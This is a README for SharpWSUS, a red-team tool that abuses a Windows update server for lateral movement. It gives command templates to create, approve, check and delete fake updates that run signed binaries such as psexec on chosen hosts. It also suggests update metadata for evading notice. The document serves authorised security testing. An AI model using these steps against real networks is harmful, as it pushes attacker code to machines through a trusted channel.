SharpWSUS is a CSharp tool for lateral movement through WSUS. There is a corresponding blog (https://labs.nettitude.com/blog/introducing-sharpwsus/) which has more detailed information about the tooling, use case and detection.
Massive credit to the below resources that really did 90% of this for me. This tool is just an enhancement of the below for C2 reliability and flexibility.
- https://github.com/AlsidOfficial/WSUSpendu - PowerShell tool for abusing WSUS
- https://github.com/ThunderGunExpress/Thunder_Woosus - C# tool for abusing WSUS
Phil Keeble @ Nettitude Red Team

Commands listed below have optional parameters in <>.

Locate the WSUS server:

    SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:

    SharpWSUS.exe inspect

Create an update (NOTE: the payload has to be a Windows-signed binary):

    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MS RC] /description:[description] /url:[url]>

Approve an update:

    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added to] /approver:[Name of approver]>

Check the status of an update:

    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete an update and clean up the groups that were added:

    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>
- The binary has to be Windows-signed, so psexec, msiexec, msbuild etc. could be useful for lateral movement.
- The metadata on the create command is not required, but is useful for blending in to the environment.
- If testing in a lab, the first update is usually quick, then each subsequent update will take a couple of hours (this is due to how Windows evaluates whether an update is already installed or not).